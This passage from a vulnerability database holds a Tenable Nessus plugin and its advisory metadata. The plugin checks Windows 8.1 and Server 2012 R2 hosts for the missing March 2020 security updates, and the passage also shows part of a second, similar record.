The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user.\n (CVE-2020-0832, CVE-2020-0833)\n\n - A remote code execution vulnerability exists in the way the scripting engine handles objects in memory in Microsoft browsers. The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user.\n (CVE-2020-0768, CVE-2020-0830)\n\n - An elevation of privilege vulnerability exists in the Windows Installer when MSI packages process symbolic links. An attacker who successfully exploited this vulnerability could bypass access restrictions to add or remove files. (CVE-2020-0779)\n\n - An elevation of privilege vulnerability exists when the Windows Background Intelligent Transfer Service (BITS) improperly handles symbolic links. An attacker who successfully exploited this vulnerability could overwrite a targeted file leading to an elevated status.\n (CVE-2020-0787)\n\n - A remote code execution vulnerability exists in the way that the VBScript engine handles objects in memory. The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user. (CVE-2020-0847)\n\n - An elevation of privilege vulnerability exists when the Windows User Profile Service (ProfSvc) improperly handles symlinks. An attacker who successfully exploited this vulnerability could delete files and folders in an elevated context. 
(CVE-2020-0785)\n\n - An information disclosure vulnerability exists in Windows when the Windows Imaging Component fails to properly handle objects in memory. An attacker who successfully exploited this vulnerability could obtain information to further compromise the user's system.\n There are multiple ways an attacker could exploit this vulnerability: (CVE-2020-0853)\n\n - An elevation of privilege vulnerability exists when the Windows Language Pack Installer improperly handles file operations. An attacker who successfully exploited this vulnerability could run processes in an elevated context. An attacker could exploit this vulnerability by running a specially crafted application on the victim system. The update addresses the vulnerability by correcting the way the Windows Language Pack Installer handles file operations. (CVE-2020-0822)\n\n - An elevation of privilege vulnerability exists when the Windows ActiveX Installer Service improperly handles memory. (CVE-2020-0770, CVE-2020-0773, CVE-2020-0860)", "cvss3": {"score": 8.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2020-03-10T00:00:00", "type": "nessus", "title": "KB4541505: Windows 8.1 and Windows Server 2012 R2 March 2020 Security Update", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2020-0645", "CVE-2020-0684", "CVE-2020-0768", "CVE-2020-0769", "CVE-2020-0770", "CVE-2020-0771", "CVE-2020-0772", "CVE-2020-0773", "CVE-2020-0774", "CVE-2020-0777", "CVE-2020-0778", "CVE-2020-0779", "CVE-2020-0780", "CVE-2020-0781", "CVE-2020-0783", "CVE-2020-0785", "CVE-2020-0787", "CVE-2020-0788", "CVE-2020-0791", "CVE-2020-0797", "CVE-2020-0799", "CVE-2020-0800", "CVE-2020-0802", "CVE-2020-0803", "CVE-2020-0804", "CVE-2020-0806", "CVE-2020-0814", "CVE-2020-0819", "CVE-2020-0822", "CVE-2020-0824", "CVE-2020-0830", "CVE-2020-0832", "CVE-2020-0833", "CVE-2020-0834", "CVE-2020-0840", "CVE-2020-0842", "CVE-2020-0843", "CVE-2020-0844", "CVE-2020-0845", "CVE-2020-0847", "CVE-2020-0849", 
"CVE-2020-0853", "CVE-2020-0857", "CVE-2020-0858", "CVE-2020-0859", "CVE-2020-0860", "CVE-2020-0861", "CVE-2020-0864", "CVE-2020-0865", "CVE-2020-0866", "CVE-2020-0871", "CVE-2020-0874", "CVE-2020-0877", "CVE-2020-0879", "CVE-2020-0880", "CVE-2020-0881", "CVE-2020-0882", "CVE-2020-0883", "CVE-2020-0885", "CVE-2020-0887", "CVE-2020-0897"], "modified": "2022-01-31T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS20_MAR_4541509.NASL", "href": "https://www.tenable.com/plugins/nessus/134374", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\n\n\n\n\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(134374);\n script_version(\"1.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/01/31\");\n\n script_cve_id(\n \"CVE-2020-0645\",\n \"CVE-2020-0684\",\n \"CVE-2020-0768\",\n \"CVE-2020-0769\",\n \"CVE-2020-0770\",\n \"CVE-2020-0771\",\n \"CVE-2020-0772\",\n \"CVE-2020-0773\",\n \"CVE-2020-0774\",\n \"CVE-2020-0777\",\n \"CVE-2020-0778\",\n \"CVE-2020-0779\",\n \"CVE-2020-0780\",\n \"CVE-2020-0781\",\n \"CVE-2020-0783\",\n \"CVE-2020-0785\",\n \"CVE-2020-0787\",\n \"CVE-2020-0788\",\n \"CVE-2020-0791\",\n \"CVE-2020-0797\",\n \"CVE-2020-0799\",\n \"CVE-2020-0800\",\n \"CVE-2020-0802\",\n \"CVE-2020-0803\",\n \"CVE-2020-0804\",\n \"CVE-2020-0806\",\n \"CVE-2020-0814\",\n \"CVE-2020-0819\",\n \"CVE-2020-0822\",\n \"CVE-2020-0824\",\n \"CVE-2020-0830\",\n \"CVE-2020-0832\",\n \"CVE-2020-0833\",\n \"CVE-2020-0834\",\n \"CVE-2020-0840\",\n \"CVE-2020-0842\",\n \"CVE-2020-0843\",\n \"CVE-2020-0844\",\n \"CVE-2020-0845\",\n \"CVE-2020-0847\",\n \"CVE-2020-0849\",\n \"CVE-2020-0853\",\n \"CVE-2020-0857\",\n \"CVE-2020-0858\",\n \"CVE-2020-0859\",\n \"CVE-2020-0860\",\n \"CVE-2020-0861\",\n \"CVE-2020-0864\",\n \"CVE-2020-0865\",\n 
\"CVE-2020-0866\",\n \"CVE-2020-0871\",\n \"CVE-2020-0874\",\n \"CVE-2020-0877\",\n \"CVE-2020-0879\",\n \"CVE-2020-0880\",\n \"CVE-2020-0881\",\n \"CVE-2020-0882\",\n \"CVE-2020-0883\",\n \"CVE-2020-0885\",\n \"CVE-2020-0887\",\n \"CVE-2020-0897\"\n );\n script_xref(name:\"MSKB\", value:\"4541505\");\n script_xref(name:\"MSKB\", value:\"4541509\");\n script_xref(name:\"MSFT\", value:\"MS20-4541505\");\n script_xref(name:\"MSFT\", value:\"MS20-4541509\");\n script_xref(name:\"IAVA\", value:\"2020-A-0139-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/07/28\");\n\n script_name(english:\"KB4541505: Windows 8.1 and Windows Server 2012 R2 March 2020 Security Update\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 4541505\nor cumulative update 4541509. It is, therefore, affected by\nmultiple vulnerabilities :\n\n - An elevation of privilege vulnerability exists when the\n Windows Device Setup Manager improperly handles file\n operations. An attacker who successfully exploited this\n vulnerability could run processes in an elevated\n context. An attacker could exploit this vulnerability by\n running a specially crafted application on the victim\n system. The update addresses the vulnerability by\n correcting the way the Windows Device Setup Manager\n handles file operations. (CVE-2020-0819)\n\n - An elevation of privilege vulnerability exists when the\n Windows Work Folder Service improperly handles file\n operations. An attacker who successfully exploited this\n vulnerability could run processes in an elevated\n context. An attacker could exploit this vulnerability by\n running a specially crafted application on the victim\n system. The update addresses the vulnerability by\n correcting the way the Windows Work Folder Service\n handles file operations. 
(CVE-2020-0777, CVE-2020-0797,\n CVE-2020-0800, CVE-2020-0864, CVE-2020-0865,\n CVE-2020-0866, CVE-2020-0897)\n\n - A remote code execution vulnerability exists when\n Internet Explorer improperly accesses objects in memory.\n The vulnerability could corrupt memory in such a way\n that an attacker could execute arbitrary code in the\n context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2020-0824)\n\n - An elevation of privilege vulnerability exists in\n Windows Installer because of the way Windows Installer\n handles certain filesystem operations. (CVE-2020-0814,\n CVE-2020-0842, CVE-2020-0843)\n\n - An information vulnerability exists when Windows Modules\n Installer Service improperly discloses file information.\n Successful exploitation of the vulnerability could allow\n the attacker to read any file on the file system.\n (CVE-2020-0859)\n\n - An elevation of privilege vulnerability exists when the\n Windows Graphics Component improperly handles objects in\n memory. An attacker who successfully exploited this\n vulnerability could run processes in an elevated\n context. (CVE-2020-0791)\n\n - An elevation of privilege vulnerability exists when\n Windows improperly handles hard links. An attacker who\n successfully exploited this vulnerability could\n overwrite a targeted file leading to an elevated status.\n (CVE-2020-0840, CVE-2020-0849)\n\n - An information disclosure vulnerability exists when\n Windows Network Connections Service fails to properly\n handle objects in memory. An attacker who successfully\n exploited the vulnerability could potentially disclose\n memory contents of an elevated process. (CVE-2020-0871)\n\n - An elevation of privilege vulnerability exists when the\n "Public Account Pictures" folder improperly\n handles junctions. 
(CVE-2020-0858)\n\n - A tampering vulnerability exists when Microsoft IIS\n Server improperly handles malformed request headers. An\n attacker who successfully exploited the vulnerability\n could cause a vulnerable server to improperly process\n HTTP headers and tamper with the responses returned to\n clients. (CVE-2020-0645)\n\n - An elevation of privilege vulnerability exists in\n Windows when the Win32k component fails to properly\n handle objects in memory. An attacker who successfully\n exploited this vulnerability could run arbitrary code in\n kernel mode. An attacker could then install programs;\n view, change, or delete data; or create new accounts\n with full user rights. (CVE-2020-0788, CVE-2020-0877,\n CVE-2020-0887)\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows Network Connections Service handles\n objects in memory. An attacker who successfully\n exploited the vulnerability could execute code with\n elevated permissions. (CVE-2020-0778, CVE-2020-0802,\n CVE-2020-0803, CVE-2020-0804, CVE-2020-0845)\n\n - An elevation of privilege vulnerability exists in\n Microsoft Windows when the Windows kernel fails to\n properly handle parsing of certain symbolic links. An\n attacker who successfully exploited this vulnerability\n could potentially access privileged registry keys and\n thereby elevate permissions. An attacker could then\n install programs; view, change, or delete data; or\n create new accounts with full user rights.\n (CVE-2020-0799)\n\n - An elevation of privilege vulnerability exists when\n Connected User Experiences and Telemetry Service\n improperly handles file operations. An attacker who\n successfully exploited this vulnerability could run\n processes in an elevated context. An attacker could\n exploit this vulnerability by running a specially\n crafted application on the victim system. 
The security\n update addresses the vulnerability by correcting how the\n Connected User Experiences and Telemetry Service handles\n file operations. (CVE-2020-0844)\n\n - A remote code execution vulnerability exists in\n Microsoft Windows that could allow remote code execution\n if a .LNK file is processed. An attacker who\n successfully exploited this vulnerability could gain the\n same user rights as the local user. (CVE-2020-0684)\n\n - An elevation of privilege vulnerability exists when the\n Windows CSC Service improperly handles memory.\n (CVE-2020-0769, CVE-2020-0771)\n\n - An information disclosure vulnerability exists in the\n way that the Windows Graphics Device Interface (GDI)\n handles objects in memory, allowing an attacker to\n retrieve information from a targeted system. By itself,\n the information disclosure does not allow arbitrary code\n execution; however, it could allow arbitrary code to be\n run if the attacker uses it in combination with another\n vulnerability. (CVE-2020-0874, CVE-2020-0879)\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows Search Indexer handles objects in\n memory. An attacker who successfully exploited the\n vulnerability could execute code with elevated\n permissions. (CVE-2020-0857)\n\n - An elevation of privilege vulnerability exists in\n Windows Error Reporting (WER) when WER handles and\n executes files. The vulnerability could allow elevation\n of privilege if an attacker can successfully exploit it.\n An attacker who successfully exploited the vulnerability\n could gain greater access to sensitive information and\n system functionality. (CVE-2020-0806)\n\n - An information disclosure vulnerability exists when the\n Windows GDI component improperly discloses the contents\n of its memory. An attacker who successfully exploited\n the vulnerability could obtain information to further\n compromise the users system. 
There are multiple ways an\n attacker could exploit the vulnerability, such as by\n convincing a user to open a specially crafted document,\n or by convincing a user to visit an untrusted webpage.\n The security update addresses the vulnerability by\n correcting how the Windows GDI component handles objects\n in memory. (CVE-2020-0774, CVE-2020-0880, CVE-2020-0882)\n\n - A remote code execution vulnerability exists in the way\n that the Windows Graphics Device Interface (GDI) handles\n objects in the memory. An attacker who successfully\n exploited this vulnerability could take control of the\n affected system. An attacker could then install\n programs; view, change, or delete data; or create new\n accounts with full user rights. (CVE-2020-0881,\n CVE-2020-0883)\n\n - An information disclosure vulnerability exists when the\n Windows GDI component improperly discloses the contents\n of its memory. An attacker who successfully exploited\n the vulnerability could obtain information to further\n compromise a users system. There are multiple ways an\n attacker could exploit the vulnerability, such as by\n convincing a user to open a specially crafted document\n or by convincing a user to visit an untrusted webpage.\n The update addresses the vulnerability by correcting how\n the Windows GDI component handles objects in memory.\n (CVE-2020-0885)\n\n - An elevation of privilege vulnerability exists when\n Windows Error Reporting improperly handles memory.\n (CVE-2020-0772)\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows Network List Service handles\n objects in memory. An attacker who successfully\n exploited the vulnerability could execute code with\n elevated permissions. (CVE-2020-0780)\n\n - An elevation of privilege vulnerability exists when\n Windows improperly handles calls to Advanced Local\n Procedure Call (ALPC). 
An attacker who successfully\n exploited this vulnerability could run arbitrary code in\n the security context of the local system. An attacker\n could then install programs; view, change, or delete\n data; or create new accounts with full user rights.\n (CVE-2020-0834)\n\n - An elevation of privilege vulnerability exists when the\n Windows Universal Plug and Play (UPnP) service\n improperly handles objects in memory. An attacker who\n successfully exploited this vulnerability could run\n arbitrary code with elevated system privileges. An\n attacker could then install programs; view, change, or\n delete data; or create new accounts with full user\n rights. (CVE-2020-0781, CVE-2020-0783)\n\n - An information disclosure vulnerability exists when the\n Windows Network Driver Interface Specification (NDIS)\n improperly handles memory. (CVE-2020-0861)\n\n - A remote code execution vulnerability exists in the way\n that the scripting engine handles objects in memory in\n Internet Explorer. The vulnerability could corrupt\n memory in such a way that an attacker could execute\n arbitrary code in the context of the current user. An\n attacker who successfully exploited the vulnerability\n could gain the same user rights as the current user.\n (CVE-2020-0832, CVE-2020-0833)\n\n - A remote code execution vulnerability exists in the way\n the scripting engine handles objects in memory in\n Microsoft browsers. The vulnerability could corrupt\n memory in such a way that an attacker could execute\n arbitrary code in the context of the current user. An\n attacker who successfully exploited the vulnerability\n could gain the same user rights as the current user.\n (CVE-2020-0768, CVE-2020-0830)\n\n - An elevation of privilege vulnerability exists in the\n Windows Installer when MSI packages process symbolic\n links. An attacker who successfully exploited this\n vulnerability could bypass access restrictions to add or\n remove files. 
(CVE-2020-0779)\n\n - An elevation of privilege vulnerability exists when the\n Windows Background Intelligent Transfer Service (BITS)\n improperly handles symbolic links. An attacker who\n successfully exploited this vulnerability could\n overwrite a targeted file leading to an elevated status.\n (CVE-2020-0787)\n\n - A remote code execution vulnerability exists in the way\n that the VBScript engine handles objects in memory. The\n vulnerability could corrupt memory in such a way that an\n attacker could execute arbitrary code in the context of\n the current user. An attacker who successfully exploited\n the vulnerability could gain the same user rights as the\n current user. (CVE-2020-0847)\n\n - An elevation of privilege vulnerability exists when the\n Windows User Profile Service (ProfSvc) improperly\n handles symlinks. An attacker who successfully exploited\n this vulnerability could delete files and folders in an\n elevated context. (CVE-2020-0785)\n\n - An information disclosure vulnerability exists in\n Windows when the Windows Imaging Component fails to\n properly handle objects in memory. An attacker who\n successfully exploited this vulnerability could obtain\n information to further compromise the user's system.\n There are multiple ways an attacker could exploit this\n vulnerability: (CVE-2020-0853)\n\n - An elevation of privilege vulnerability exists when the\n Windows Language Pack Installer improperly handles file\n operations. An attacker who successfully exploited this\n vulnerability could run processes in an elevated\n context. An attacker could exploit this vulnerability by\n running a specially crafted application on the victim\n system. The update addresses the vulnerability by\n correcting the way the Windows Language Pack Installer\n handles file operations. (CVE-2020-0822)\n\n - An elevation of privilege vulnerability exists when the\n Windows ActiveX Installer Service improperly handles\n memory. 
(CVE-2020-0770, CVE-2020-0773, CVE-2020-0860)\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/4541505/windows-8-1-kb4541505\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/4541509/windows-8-1-kb4541509\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Security Only update KB4541505 or Cumulative Update KB4541509.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-0883\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Background Intelligent Transfer Service Arbitrary File Move Privilege Elevation Vulnerability');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/03/10\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/03/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/03/10\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2022 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\nbulletin = \"MS20-03\";\nkbs = make_list('4541509', '4541505');\n\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\n\nif (hotfix_check_sp_range(win81:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\n# Windows 8 EOL\nproductname = get_kb_item_or_exit(\"SMB/ProductName\", exit_code:1);\nif (\"Windows 8\" >< productname && \"8.1\" >!< productname)\n audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:\"6.3\",\n sp:0,\n rollup_date:\"03_2020\",\n bulletin:bulletin,\n rollup_kb_list:[4541509, 4541505])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-06-16T15:27:55", "description": "The remote Windows host is missing security update 4540693.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - An elevation of privilege vulnerability exists when the Windows Device Setup Manager improperly handles file operations. 
An attacker who successfully exploited this vulnerability could run processes in an elevated context. An attacker could exploit this vulnerability by running a specially crafted application on the victim system. The update addresses the vulnerability by correcting the way the Windows Device Setup Manager handles file operations. (CVE-2020-0819)\n\n - An elevation of privilege vulnerability exists when the Windows Work Folder Service improperly handles file operations. An attacker who successfully exploited this vulnerability could run processes in an elevated context. An attacker could exploit this vulnerability by running a specially crafted application on the victim system. The update addresses the vulnerability by correcting the way the Windows Work Folder Service handles file operations. (CVE-2020-0777, CVE-2020-0797, CVE-2020-0800, CVE-2020-0864, CVE-2020-0865, CVE-2020-0866, CVE-2020-0897)\n\n - A remote code execution vulnerability exists when Internet Explorer improperly accesses objects in memory.\n The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user. (CVE-2020-0824)\n\n - An elevation of privilege vulnerability exists in Windows Installer because of the way Windows Installer handles certain filesystem operations. (CVE-2020-0814, CVE-2020-0842, CVE-2020-0843)\n\n - An information vulnerability exists when Windows Modules Installer Service improperly discloses file information.\n Successful exploitation of the vulnerability could allow the attacker to read any file on the file system.\n (CVE-2020-0859)\n\n - An elevation of privilege vulnerability exists when the Windows Graphics Component improperly handles objects in memory. An attacker who successfully exploited this vulnerability could run processes in an elevated context. 
(CVE-2020-0791)\n\n - An information disclosure vulnerability exists when Windows Network Connections Service fails to properly handle objects in memory. An attacker who successfully exploited the vulnerability could potentially disclose memory contents of an elevated process. (CVE-2020-0871)\n\n - An elevation of privilege vulnerability exists when the "Public Account Pictures" folder improperly handles junctions. (CVE-2020-0858)\n\n - A tampering vulnerability exists when Microsoft IIS Server improperly handles malformed request headers. An attacker who successfully exploited the vulnerability could cause a vulnerable server to improperly process HTTP headers and tamper with the responses returned to clients. (CVE-2020-0645)\n\n - An elevation of privilege vulnerability exists in Windows when the Win32k component fails to properly handle objects in memory. An attacker who successfully exploited this vulnerability could run arbitrary code in kernel mode. An attacker could then install programs;\n view, change, or delete data; or create new accounts with full user rights. (CVE-2020-0788, CVE-2020-0877, CVE-2020-0887)\n\n - An elevation of privilege vulnerability exists in the way that the Windows Network Connections Service handles objects in memory. An attacker who successfully exploited the vulnerability could execute code with elevated permissions. (CVE-2020-0778, CVE-2020-0802, CVE-2020-0803, CVE-2020-0804, CVE-2020-0845)\n\n - An elevation of privilege vulnerability exists in Microsoft Windows when the Windows kernel fails to properly handle parsing of certain symbolic links. An attacker who successfully exploited this vulnerability could potentially access privileged registry keys and thereby elevate permissions. 
An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.\n (CVE-2020-0799)\n\n - An elevation of privilege vulnerability exists when Connected User Experiences and Telemetry Service improperly handles file operations. An attacker who successfully exploited this vulnerability could run processes in an elevated context. An attacker could exploit this vulnerability by running a specially crafted application on the victim system. The security update addresses the vulnerability by correcting how the Connected User Experiences and Telemetry Service handles file operations. (CVE-2020-0844)\n\n - An elevation of privilege vulnerability exists when the Diagnostics Hub Standard Collector or the Visual Studio Standard Collector allows file creation in arbitrary locations. (CVE-2020-0810)\n\n - A memory corruption vulnerability exists when Windows Media Foundation improperly handles objects in memory.\n An attacker who successfully exploited the vulnerability could install programs; view, change, or delete data; or create new accounts with full user rights. There are multiple ways an attacker could exploit the vulnerability, such as by convincing a user to open a specially crafted document, or by convincing a user to visit a malicious webpage. The security update addresses the vulnerability by correcting how Windows Media Foundation handles objects in memory. (CVE-2020-0801, CVE-2020-0809, CVE-2020-0869)\n\n - A remote code execution vulnerability exists in Microsoft Windows that could allow remote code execution if a .LNK file is processed. An attacker who successfully exploited this vulnerability could gain the same user rights as the local user. (CVE-2020-0684)\n\n - An elevation of privilege vulnerability exists when Windows improperly handles hard links. 
An attacker who successfully exploited this vulnerability could overwrite a targeted file leading to an elevated status.\n (CVE-2020-0840, CVE-2020-0841, CVE-2020-0849, CVE-2020-0896)\n\n - An elevation of privilege vulnerability exists when the Windows User Profile Service (ProfSvc) improperly handles symlinks. An attacker who successfully exploited this vulnerability could delete files and folders in an elevated context. (CVE-2020-0785)\n\n - An information disclosure vulnerability exists in the way that the Windows Graphics Device Interface (GDI) handles objects in memory, allowing an attacker to retrieve information from a targeted system. By itself, the information disclosure does not allow arbitrary code execution; however, it could allow arbitrary code to be run if the attacker uses it in combination with another vulnerability. (CVE-2020-0874, CVE-2020-0879)\n\n - An elevation of privilege vulnerability exists in the way that the Windows Search Indexer handles objects in memory. An attacker who successfully exploited the vulnerability could execute code with elevated permissions. (CVE-2020-0857)\n\n - An elevation of privilege vulnerability exists in Windows Error Reporting (WER) when WER handles and executes files. The vulnerability could allow elevation of privilege if an attacker can successfully exploit it.\n An attacker who successfully exploited the vulnerability could gain greater access to sensitive information and system functionality. (CVE-2020-0806)\n\n - An information disclosure vulnerability exists when the Windows GDI component improperly discloses the contents of its memory. An attacker who successfully exploited the vulnerability could obtain information to further compromise the user's system. 
There are multiple ways an attacker could exploit the vulnerability, such as by convincing a user to open a specially crafted document, or by convincing a user to visit an untrusted webpage.\n The security update addresses the vulnerability by correcting how the Windows GDI component handles objects in memory. (CVE-2020-0774, CVE-2020-0880, CVE-2020-0882)\n\n - A remote code execution vulnerability exists in the way that the Windows Graphics Device Interface (GDI) handles objects in memory. An attacker who successfully exploited this vulnerability could take control of the affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. (CVE-2020-0881, CVE-2020-0883)\n\n - An information disclosure vulnerability exists when the Windows GDI component improperly discloses the contents of its memory. An attacker who successfully exploited the vulnerability could obtain information to further compromise a user's system. There are multiple ways an attacker could exploit the vulnerability, such as by convincing a user to open a specially crafted document or by convincing a user to visit an untrusted webpage.\n The update addresses the vulnerability by correcting how the Windows GDI component handles objects in memory.\n (CVE-2020-0885)\n\n - An information disclosure vulnerability exists when Media Foundation improperly handles objects in memory.\n An attacker who successfully exploited this vulnerability could obtain information to further compromise the user's system. An attacker who had already gained execution on the victim system could exploit this vulnerability by running a specially crafted application. The update addresses the vulnerability by correcting how Media Foundation handles objects in memory. (CVE-2020-0820)\n\n - An elevation of privilege vulnerability exists when the Windows Update Orchestrator Service improperly handles file operations. 
An attacker who successfully exploited this vulnerability could run processes in an elevated context. An attacker could exploit this vulnerability by running a specially crafted application on the victim system. The update addresses the vulnerability by correcting the way the Windows Update Orchestrator Service handles file operations. (CVE-2020-0867, CVE-2020-0868)\n\n - An elevation of privilege vulnerability exists in the way that the Windows Network List Service handles objects in memory. An attacker who successfully exploited the vulnerability could execute code with elevated permissions. (CVE-2020-0780)\n\n - An elevation of privilege vulnerability exists when Windows improperly handles calls to Advanced Local Procedure Call (ALPC). An attacker who successfully exploited this vulnerability could run arbitrary code in the security context of the local system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.\n (CVE-2020-0834)\n\n - An elevation of privilege vulnerability exists when the Windows Universal Plug and Play (UPnP) service improperly handles objects in memory. An attacker who successfully exploited this vulnerability could run arbitrary code with elevated system privileges. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. (CVE-2020-0781, CVE-2020-0783)\n\n - An information disclosure vulnerability exists when the Windows Network Driver Interface Specification (NDIS) improperly handles memory. (CVE-2020-0861)\n\n - An elevation of privilege vulnerability exists when DirectX improperly handles objects in memory. An attacker who successfully exploited this vulnerability could run arbitrary code in kernel mode. 
An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.\n (CVE-2020-0690)\n\n - A denial of service vulnerability exists when the Windows Tile Object Service improperly handles hard links. An attacker who successfully exploited the vulnerability could cause a target system to stop responding. (CVE-2020-0786)\n\n - A remote code execution vulnerability exists in the way that the scripting engine handles objects in memory in Internet Explorer. The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user.\n (CVE-2020-0832, CVE-2020-0833)\n\n - A remote code execution vulnerability exists in the way the scripting engine handles objects in memory in Microsoft browsers. The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user.\n (CVE-2020-0768, CVE-2020-0830)\n\n - An elevation of privilege vulnerability exists in the Windows Installer when MSI packages process symbolic links. An attacker who successfully exploited this vulnerability could bypass access restrictions to add or remove files. (CVE-2020-0779)\n\n - An elevation of privilege vulnerability exists when the Windows Background Intelligent Transfer Service (BITS) improperly handles symbolic links. An attacker who successfully exploited this vulnerability could overwrite a targeted file leading to an elevated status.\n (CVE-2020-0787)\n\n - A remote code execution vulnerability exists in the way that the VBScript engine handles objects in memory. The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. 
An attacker who successfully exploited the vulnerability could gain the same user rights as the current user. (CVE-2020-0847)\n\n - An elevation of privilege vulnerability exists when the Diagnostics Hub Standard Collector Service improperly handles file operations. An attacker who successfully exploited this vulnerability could gain elevated privileges. An attacker with unprivileged access to a vulnerable system could exploit this vulnerability. The security update addresses the vulnerability by ensuring the Diagnostics Hub Standard Collector Service properly handles file operations. (CVE-2020-0793)\n\n - An information disclosure vulnerability exists when Windows Error Reporting improperly handles file operations. (CVE-2020-0775)\n\n - An elevation of privilege vulnerability exists when the Windows CSC Service improperly handles memory.\n (CVE-2020-0769, CVE-2020-0771)\n\n - An information disclosure vulnerability exists in Windows when the Windows Imaging Component fails to properly handle objects in memory. An attacker who successfully exploited this vulnerability could obtain information to further compromise the user's system.\n There are multiple ways an attacker could exploit this vulnerability: (CVE-2020-0853)\n\n - An elevation of privilege vulnerability exists when the Windows Language Pack Installer improperly handles file operations. An attacker who successfully exploited this vulnerability could run processes in an elevated context. An attacker could exploit this vulnerability by running a specially crafted application on the victim system. The update addresses the vulnerability by correcting the way the Windows Language Pack Installer handles file operations. (CVE-2020-0822)\n\n - An elevation of privilege vulnerability exists when the Windows ActiveX Installer Service improperly handles memory. 
